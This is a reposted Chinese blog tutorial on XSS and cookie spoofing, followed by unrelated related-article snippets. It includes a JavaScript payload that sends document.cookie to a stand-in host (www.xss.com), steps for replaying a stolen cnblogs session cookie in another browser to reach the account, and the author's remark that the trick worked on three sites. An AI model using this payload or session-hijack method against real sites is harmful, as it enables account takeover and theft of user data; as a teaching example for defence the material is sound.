通过COOKIE欺骗登录网站后台

news/2024/5/13 17:17:20/文章来源:https://blog.csdn.net/weixin_30470857/article/details/98389015

1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。其实XSS攻击就是网站输入框没有限制非法字符,或者没有对脚本内容进行编码导致的!

 

var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

 

比如这段代码,当我们没有对网站输入框进行非法字符的限制的话,用户输入了这段脚本,这样就会神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点,我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。

 

 

2.当然我今天说的主要不是这些,而是通过你拿到的cookie,植入到你的浏览器中然后就可以访问网站后台了,下面我来为大家演示一遍,如何通过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试!

首先我们通过IE浏览器拿到我们登入博客园后的Cookie,通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息,然后我们找到cnblogs.com站点下的Cookie,然后复制下.CNBlogsCookie和key和value值,如图所示! 

 

3.众所周知,cookies属于隐私数据,不同浏览器保存在不同地方。不可能共享的,此时我们再次打开Chorme浏览器,如图IE浏览器为登录状态,而chorme浏览器为未登录状态

 

 

4.那么此时我们就将刚拷贝的IE浏览器下博客园的cookie数据植入到chrome浏览器中,实现cookie欺骗登录到博客园后台,在chrome浏览器中添加cookies扩展程序,方便写入和删除cookie

 

 

5.然后打开cookies插件,我们就找到cnblogs.com下的cookie,默认没有登录的时候是没有.CNBlogsCookie这个cookie的, 然后我们点击添加一个cookie,将.CNBlogsCookie和key和value值写入进去,再刷新网站页面,成功进入博客园网站后台!  

 

 

6.如果将这个方法,再结合到开始讲的XSS攻击的话获取到别人网站的cookie信息,那么黑进别人网站的后台就很容易了,我自己也试了三个网站,都是可以成功进入的! 当然我说这些不是为了让大家黑别人的网站,只是只有弄懂了这些,才能更好的防范,保证自己开发的网站的安全! 

转载于:https://www.cnblogs.com/MR-YY/p/5259178.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_724435.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

win7服务器建网站教程,win7搭建Web服务器教程

如何实现资源共享?那就需要利用Web服务器,借助它来实现信息的同步,也能将信息上传到服务器端,让用户悉知。那win7如何搭建Web服务器来实现这一目的呢?下面小编就给大家介绍win7搭建Web服务器教程。第一步:打开控制面板&#xff…

一句话道破SEO真谛

都在问SEO是什么?SEO到底是做什么的?为什么要做SEO? SEO是什么?一句话:SEO就是优化。优化包含两部分:内部优化(网站优化)和外部优化(市场优化) 内部优化&am…

使用C#的HttpWebRequest模拟登陆网站

使用C#的HttpWebRequest模拟登陆网站 原文:使用C#的HttpWebRequest模拟登陆网站这篇文章是有关模拟登录网站方面的。 实现步骤; 启用一个web会话 发送模拟数据请求(POST或者GET) 获取会话的CooKie 并根据该CooKie继续访问登录后的页面&#x…

SEO站长必备的十大常用搜索引擎高级指令

作为一个seo人员,不懂得必要的搜索引擎高级指令,不是一个合格的seo。网站优化技术配合一些搜索引擎高级指令将使得优化工作变得简单。今日就和大家聊聊SEO站长必备的十大常用搜索引擎高级指令的那些事儿。 【1】引号的用法 把关键字打上引号后把引号部分…

转:游戏玩家集体出逃 社交网站遭遇迷途

原文地址:http://games.sina.com.cn/y/2010-04-27/1130394729.shtml 在经历了摘菜和抢车位等游戏引发的狂热之后, 国内社交游戏玩家集体出逃,社交网站危机显现。 在商业价值和盈利模式的质疑声中,这些依靠游戏起家的Facebook模…

使用phpmyadmin管理远程sql_网站搬家记录-使用cPanel面板从SugarHosts迁出

自从购买了独立服务器,就准备把分散在各处主机的站点迁移到一块。目前最麻烦的就是在SugarHosts.com上的产品公园站点,只能使用cPanel面板,而我对这个面板又不熟悉,故在此做下记录。cPanel是什么cPanel是一套基于Web的自动化hosti…

部分网站为什么上不去_大量网站索引暴跌,百度搞鬼可以如何应对

做SEO的同事一大早跟我说他们站长群一早就炸了!只因为进入11月以来,不少的站点收录变慢、收录变少,今天更是有不少站长反馈说,索引量直接砍半。根据提供的索引截图来看,昨天的索引量都出现了断崖式暴跌,200…

《SEO的艺术(原书第2版)》——3.12 规划和评估的高级方法

3.12 规划和评估的高级方法 业务规划有许多方法。其中一种著名的方法是SWOT(Strengths、Weaknesses、Opportunities、Threats,优势、劣势、机遇、威胁)分析。还有一些方法能够确保规划目标的正确,如SMART(Specific、Me…

快速构建LAMP网站平台

快速构建LAMP网站平台1.1 问题 本例要求基于Linux主机快速构建LAMP动态网站平台,并确保可以支撑PHP应用及数据库,完成下列任务: 1)安装LAMP平台各组件,启动LAMP平台 软件包:httpd、mariadb-server、mariadb…

[转载]网站性能优化之CSS无图片技术 —— 网站性能优化

一、无图片技术定义在不使用CSS Image(通过CSS的引入的背景图片,不包括img标签内的图片)情况下生成类似图片效果的技术;换句话的意思就是在使用纯CSS生成类似图片效果的技术。二、为什么要“无图片”?首先我们通过yslow的statisti…

WebRAY网站检查技术支撑平台的实践

平台与网站越来越多,问题更多 互联网服务平台及门户网站已经成为互联网时代政府机关企事业单位的形象代言,是政企单位展示自身形象的一个重要渠道。从国务院办公厅组织开展的第一次全国政府网站普查情况获悉,截至2015年11月,各地区…

强大的跨平台绘制流程图软件网站ProcessOn

一个强大的作图网址(https://www.processon.com),告别vision,rose等需要本地安装的软件,只需要连接网络不需要安装任何软件就能制作流程图了。能绘制基本流程图形,flowchart流程图,bpmn,evc企业价值链&…

Google Developers 中国网站正式发布

Google Developers 中国网站 (developers.google.cn) 正式发布!Google Developers 中国网站是特别为中国开发者而建立的,它汇集了 Google 为全球开发者所提供的开发技术资源,包括 API 文档、开发案例、技术培训的视频。并涵盖了以下关键开发技…

给自己的网站加入智能聊天功能

引言现在突然发现有很多 QQ 群都开启了群机器人的功能,其中有两个角色,他们分别是:Baby Q 和 QQ 小冰。在 Q 群中,你可以对他们进行任意程度的调戏,不过,遗憾的是鱼和熊掌不可得兼,一个群只能进…

网站已死 互联网永生

从诞生到现在,网站已经走过了20个年头。相比当年的流行,如今它已经开始衰落,逐渐让位于更简单且时髦的智能应用。这些应用更关注的不是搜索效果,而是信息获取。克莱斯安德森(Chris Anderson)向我们解释了这些新应用所反映的资本聚…

j2ee 简单网站搭建:(五)使用 jcaptcha 生成验证码图片

为什么80%的码农都做不了架构师?>>> 《j2ee 简单网站搭建:(一) windows 操作系统下使用 eclipse 建立 maven web 项目》《j2ee 简单网站搭建:(二)添加和配置 spring spring-mvc 的…

步步为营-90-SEO(url重写+超链接技巧)

目的:便于搜索引擎抓取 url重写:将带参数的url如:https://i.cnblogs.com/EditPosts.aspx?opt1.修改为https://i.cnblogs.com/EditPosts.aspx_1 1:在BookList修改如下链接方式 href"<%#Eval("Id","/Goods/BookDetail_{0}.aspx") %>"> 2…

asp.net网站接入QQ登录

这两天在做网站第三方登录&#xff0c;总结一下QQ登录吧&#xff0c;支付宝就不用了&#xff08;下载dome把ID什么的换一换就基本可以了。&#xff09;&#xff0c;本文主要说的是代码的实现方式&#xff0c;逻辑部分主要还是根据帮助文档来的。不懂的同学可以先看看文档。 直接…

ios和安卓测试包发布网站http://fir.im的注册与常用功能

作为专业的ios和安卓测试包发布网站&#xff0c;注册超简单。支持输入网址直接下载和二维码扫描下载。功能类似TestFlight ,但又比它强大&#xff0c;支持游客访问密码&#xff0c;ios和安卓测试app都支持。模仿TestFlight &#xff0c;又高于TestFlight 。 1 注册是我见到的最…

兰亭集势(Lightinthebox)网站结构综合分析

于&#xff1a; 2010年 十一月 18日 by admin 兰亭集势 &#xff08;Lightinthebox &#xff09;是中国整合了供应链服务的在线B2C&#xff08;内部叫做L2C,LightInTheBox 2 Customer&#xff09;&#xff0c;该公司拥有一系列的供应商&#xff0c;并拥有自己的数据仓库和长期…